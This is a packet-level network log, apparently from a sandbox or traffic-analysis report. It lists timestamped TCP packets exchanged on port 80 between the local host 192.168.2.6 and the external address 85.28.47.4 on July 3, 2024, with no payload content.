Jul 3, 2024 18:08:38.571779966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571787119 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571789980 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571801901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571815968 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571819067 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571830988 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571835041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571841955 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571852922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571858883 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571861982 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571871996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571882963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571883917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571894884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571896076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571906090 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571917057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571926117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571928024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571938992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571949959 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571955919 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571960926 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571974993 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571979046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.571985960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.571990013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572001934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572017908 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.572046041 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.572551966 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572563887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572573900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572585106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.572592974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.572618961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.656919956 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.656933069 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.656944036 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657121897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657208920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657219887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657232046 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657243967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657253981 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657254934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657265902 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657277107 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657277107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657294989 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657310963 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657350063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657361031 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657371044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657380104 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657386065 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657392025 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657402039 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657413006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657418013 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657423973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657434940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657438040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657459021 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657474995 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657665014 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657692909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657704115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657715082 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657725096 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657732964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657736063 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657747984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657758951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657761097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657772064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.657776117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.657845020 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658000946 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658011913 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658021927 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658031940 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658037901 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658042908 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658052921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658054113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658065081 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658076048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658080101 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658087969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658111095 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658135891 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658462048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658474922 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658485889 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658499002 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658505917 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658509970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658520937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658523083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658552885 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658591032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658601999 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658607960 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658617973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658632040 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658649921 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658726931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658736944 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658772945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658924103 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658936024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658946991 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658957958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658967972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658967972 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658983946 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.658984900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.658998013 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659008026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659012079 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659019947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659041882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659056902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659430981 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659441948 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659452915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659465075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659472942 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659476042 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659487963 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659499884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659501076 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659511089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659522057 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659523010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659534931 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659540892 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659557104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659564972 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659575939 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659581900 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659586906 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659598112 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659600019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659610033 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659616947 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659629107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659638882 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659640074 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659651041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659665108 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659667969 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659676075 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.659693956 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.659710884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660069942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660080910 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660090923 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660101891 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660104990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660114050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660120010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660125971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660135984 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660141945 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660152912 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660164118 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660167933 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660175085 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660181999 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660187006 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660198927 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660223961 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660388947 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660399914 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660413027 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660432100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660433054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660444975 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660455942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660459042 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660466909 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660478115 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660490990 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660495996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660506964 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660506964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660521984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660535097 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660536051 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660547018 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660554886 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660557985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660571098 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.660588980 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.660603046 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661097050 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661108017 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661118984 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661130905 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661137104 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661142111 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661159992 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661187887 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661267996 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661279917 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661289930 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661304951 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661304951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661315918 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.661329985 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.661355019 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745368958 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745392084 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745404005 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745470047 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745477915 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745481968 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745546103 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745676994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745687962 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745698929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745708942 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745712996 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745721102 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745742083 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745763063 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745773077 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745784044 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745820045 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745836973 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745848894 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745860100 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.745872974 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.745901108 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746035099 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746045113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746054888 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746064901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746072054 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746076107 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746085882 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746092081 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746098995 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746125937 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746155024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746273994 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746285915 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746295929 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746311903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746323109 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746332884 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746366024 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746467113 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746479034 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746489048 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746500969 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746505022 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746512890 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746517897 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746542931 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746567011 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746716022 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746726990 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746737957 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746747971 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746758938 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746763945 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746768951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746779919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746788979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746790886 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746804953 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746804953 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746815920 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746826887 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.746830940 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.746856928 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747016907 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747051001 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747092009 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747128010 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747172117 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747210026 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747222900 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747234106 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747245073 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747256041 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747258902 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747267008 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747275114 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747307062 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747479916 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747498035 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747509003 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747519970 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747530937 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747540951 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747550964 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747554064 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747560978 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747565985 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747576952 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747587919 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747596979 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747600079 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747617006 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747633934 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747880936 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747891903 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747903109 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747912884 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747924089 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747935057 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.747936010 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747961998 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.747971058 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748147011 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748157024 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748167992 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748181105 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748198032 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748203039 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748209000 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748214960 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748219967 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748230934 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748240948 CEST	49710	80	192.168.2.6	85.28.47.4
Jul 3, 2024 18:08:38.748241901 CEST	80	49710	85.28.47.4	192.168.2.6
Jul 3, 2024 18:08:38.748253107 CEST	80	49710	85.28.47.4	192.168.2.6
